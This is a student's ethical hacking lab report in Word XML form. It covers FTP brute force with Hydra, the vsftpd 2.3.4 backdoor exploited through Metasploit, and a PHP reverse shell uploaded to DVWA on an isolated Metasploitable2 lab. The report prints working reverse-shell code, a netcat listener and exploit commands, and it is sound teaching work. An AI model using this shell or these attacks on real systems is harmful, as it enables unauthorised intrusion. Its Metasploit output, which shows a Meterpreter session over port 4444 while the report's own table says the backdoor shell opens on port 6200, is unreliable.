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8F"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>ELC ETHICAL HACKING ACTIVITY REPORT</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>COE-Experiential Learning Activities | E110-2024</w:t>
        <w:br/>
        <w:t>Thapar Institute of Engineering &amp; Technology</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Submitted by: Harshdeep Shantaram Athawale</w:t>
        <w:br/>
        <w:t>Roll No: 1024031062 | Batch: 2C74</w:t>
        <w:br/>
        <w:t>Date: 06 June 2026</w:t>
        <w:br/>
        <w:t>Submission Deadline: 15 June 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>This report documents the Ethical Hacking ELC activities performed as part of the COE-Experiential Learning curriculum. The activities simulate real-world offensive security scenarios in a controlled, isolated lab environment using intentionally vulnerable systems. All testing was conducted exclusively on systems set up for this purpose — no unauthorized systems were targeted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>2. Lab Setup &amp; Environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>2.1 Virtual Machine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Hypervisor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Oracle VirtualBox 7.2.8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Host OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Arch Linux (Kernel 7.0.7-arch2-1)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Attacker Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Arch Linux — IP: 192.168.56.1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Victim Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Metasploitable2 (Ubuntu 8.04) — IP: 192.168.56.101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Network Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Host-only Adapter (vboxnet0) — isolated network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>2.2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Nmap 7.99</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Network discovery and service version detection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Hydra 9.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Password brute-force tool (SSH, FTP, HTTP, MySQL)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Metasploit 6.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Exploitation framework — used for remote shell access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Netcat (nc)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>TCP listener for catching reverse shell connections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Apache / PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Web server and scripting for reverse shell payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>2.3 Victim Machine — Metasploitable2 IP Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The following screenshot shows the ifconfig output from the Metasploitable2 victim VM, confirming its IP address as 192.168.56.101 on the host-only network.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2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 1: Metasploitable2 VM — ifconfig showing IP 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>2.4 Network Topology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 xml:space="preserve">  [Arch Linux — Attacker]          [Metasploitable2 — Victim]</w:t>
        <w:br/>
        <w:t xml:space="preserve">   192.168.56.1 (vboxnet0)   &lt;--&gt;   192.168.56.101 (eth0)</w:t>
        <w:br/>
        <w:t xml:space="preserve">          |_____ Host-only Network (VirtualBox) _____|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>3. Activity 1 — Brute Force Attack on Login Credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>3.1 Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Demonstrate password brute-force attacks against common network services (FTP, SSH, MySQL) using Hydra to identify weak or default credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>3.2 Step 1: Reconnaissance with Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>First, an Nmap scan was performed to identify open ports and running services on the victim machine.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$ nmap -sV -p 21,22,80,3306 192.168.56.101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PORT     STATE SERVICE VERSION</w:t>
        <w:br/>
        <w:t>21/tcp   open  ftp     vsftpd 2.3.4</w:t>
        <w:br/>
        <w:t>22/tcp   open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1</w:t>
        <w:br/>
        <w:t>80/tcp   open  http    Apache httpd 2.2.8 (Ubuntu)</w:t>
        <w:br/>
        <w:t>3306/tcp open  mysql   MySQL 5.0.51a-3ubuntu5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>3.3 Step 2: FTP Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Hydra was used to brute-force FTP credentials using a custom wordlist of common passwords.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$ hydra -l msfadmin -P wordlist.txt ftp://192.168.56.101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[21][ftp] host: 192.168.56.101   login: msfadmin   password: msfadmin</w:t>
        <w:br/>
        <w:t>1 of 1 target successfully completed, 1 valid password found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Result: Successfully cracked FTP credentials — msfadmin : msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>3.4 Step 3: SSH Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>SSH brute force was attempted. Metasploitable2 uses legacy SSH algorithms (hmac-md5, hmac-sha1) that demonstrate the vulnerability of older SSH configurations.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$ hydra -l msfadmin -P wordlist.txt ssh://192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The legacy algorithm mismatch between modern Hydra and old SSH server highlighted the importance of keeping SSH configurations updated.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76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(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7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 2: Hydra FTP brute force — credentials cracked: msfadmin:msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>3.5 Outcome</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The brute force attack successfully recovered the FTP credentials, demonstrating that weak/default passwords are easily discovered by automated tools. This underscores the need for strong password policies and account lockout mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>4. Activity 2 — Opening Remote Shell Using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>4.1 Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit a known vulnerability in vsftpd 2.3.4 to open a remote Meterpreter shell on the victim machine using the Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>4.2 Vulnerability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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CVE-2011-2523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92"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vsftpd 2.3.4 (FTP Server)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92"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Backdoor — triggers on username containing ':)'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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>21 (FTP) → backdoor shell on port 6200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4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Unauthenticated remote root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>4.3 Exploitation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1: Launch Metasploit Framework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$ msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2: Select the vsftpd backdoor exploit module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msf6 &gt; use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3: Configure target and attacker IP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msf6 exploit(vsftpd_234_backdoor) &gt; set RHOSTS 192.168.56.101</w:t>
        <w:br/>
        <w:t>msf6 exploit(vsftpd_234_backdoor) &gt; set LHOST 192.168.56.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Step 4: Run the exploit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msf6 exploit(vsftpd_234_backdoor) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>4.4 Output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[*] Started reverse TCP handler on 192.168.56.1:4444</w:t>
        <w:br/>
        <w:t>[*] 192.168.56.101:21 - FTP banner: 220 (vsFTPd 2.3.4)</w:t>
        <w:br/>
        <w:t>[+] 192.168.56.101:21 - The target appears to be vulnerable.</w:t>
        <w:br/>
        <w:t>[+] 192.168.56.101:21 - Backdoor has been spawned!</w:t>
        <w:br/>
        <w:t>[*] Meterpreter session 1 opened (192.168.56.1:4444 -&gt; 192.168.56.101:42186)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316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(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1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 3: Metasploit — Backdoor spawned and Meterpreter session opened</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>4.5 Outcome</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>A Meterpreter session was successfully opened on the victim machine, granting full remote access. This demonstrates the critical risk of running outdated, unpatched software with known backdoors in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>5. Activity 3 — Exploiting Web Application for Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>5.1 Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Upload a malicious PHP reverse shell through DVWA's (Damn Vulnerable Web Application) File Upload module and catch a shell connection using Netcat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>5.2 Target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4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>DVWA (Damn Vulnerable Web Application) v1.0.7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URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>http://192.168.56.101/dvwa/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Login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>admin / password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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Unrestricted File Upload (Security Level: Low)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>5.3 PHP Reverse Shell Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>A minimal PHP reverse shell was created to connect back to the attacker machine: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&lt;?php</w:t>
        <w:br/>
        <w:t xml:space="preserve">  $ip   = '192.168.56.1';   // attacker IP</w:t>
        <w:br/>
        <w:t xml:space="preserve">  $port = 4444;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  $sock = fsockopen($ip, $port);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  $proc = proc_open('/bin/sh -i',</w:t>
        <w:br/>
        <w:t xml:space="preserve">            array(0=&gt;$sock, 1=&gt;$sock, 2=&gt;$sock), $pipes);</w:t>
        <w:br/>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>5.4 Attack Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1: Start Netcat listener on attacker machine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$ nc -lvnp 4444</w:t>
        <w:br/>
        <w:t>Listening on 0.0.0.0 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2: Login to DVWA and set security to Low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http://192.168.56.101/dvwa/login.php  →  admin / password</w:t>
        <w:br/>
        <w:t>DVWA Security → Low → Submit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3: Upload shell.php via File Upload module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DVWA → Upload → Choose file → shell.php → Upload</w:t>
        <w:br/>
        <w:br/>
        <w:t>Server response:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ../../hackable/uploads/shell.php succesfully uploaded!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Step 4: Trigger the shell by visiting the uploaded file URL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$ curl http://192.168.56.101/dvwa/hackable/uploads/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>5.5 Output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Listening on 0.0.0.0 4444</w:t>
        <w:br/>
        <w:t>Connection received on 192.168.56.101 39631</w:t>
        <w:br/>
        <w:t>sh: no job control in this shell</w:t>
        <w:br/>
        <w:t>sh-3.2$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59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9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 4: DVWA File Upload — shell.php uploaded (Security Level: Low)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819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(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 5: Netcat listener started on port 4444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42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(5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 6: Reverse shell received — sh-3.2$ prompt obtained</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>5.6 Outcome</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>A reverse shell was successfully obtained from the web server process. The attacker gained an interactive shell on the victim machine through a web application file upload vulnerability. This demonstrates the danger of allowing unrestricted file uploads without proper validation, MIME-type checking, and execution prevention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>6. Tools &amp; Scripts Used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>6.1 Custom Wordlist (wordlist.txt)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password, 123456, admin, root, msfadmin, user, toor, 12345,</w:t>
        <w:br/>
        <w:t>pass, letmein, qwerty, abc123, master, dragon, monkey</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>6.2 PHP Reverse Shell (shell.php)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&lt;?php</w:t>
        <w:br/>
        <w:t>$ip='192.168.56.1'; $port=4444;</w:t>
        <w:br/>
        <w:t>$sock=fsockopen($ip,$port);</w:t>
        <w:br/>
        <w:t>proc_open('/bin/sh -i',array(0=&gt;$sock,1=&gt;$sock,2=&gt;$sock),$pipes);</w:t>
        <w:br/>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>6.3 Metasploit Commands Summary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008000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
        <w:br/>
        <w:t>set RHOSTS 192.168.56.101</w:t>
        <w:br/>
        <w:t>set LHOST  192.168.56.1</w:t>
        <w:br/>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>7.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96"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Tool Used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96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96"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Brute Force (FTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2196"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Hydra 9.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2196"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vsftpd @ :21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2196"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>msfadmin:msfadmin cracked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2196"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Remote Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2196"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Metasploit 6.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2196"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vsftpd 2.3.4 backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2196"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Meterpreter session opened</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2196"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Web App Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2196"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Netcat + PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2196"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>DVWA File Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2196"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Reverse shell — sh-3.2$</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A8F"/>
        </w:rPr>
        <w:t>8. Conclusion &amp; Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The three activities successfully demonstrated core ethical hacking techniques against a deliberately vulnerable system (Metasploitable2). Key takeaways:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Default and weak passwords are trivially cracked — enforce strong password policies and MFA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Unpatched software with known CVEs (vsftpd 2.3.4) allows instant root access — patch regularly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Unrestricted file uploads allow remote code execution — always validate file type and prevent execution in upload directories.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Network segmentation and intrusion detection systems (IDS) can limit the blast radius of successful exploits.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>All activities were performed in an isolated lab environment on systems configured specifically for this educational purpose. No unauthorized systems were accessed.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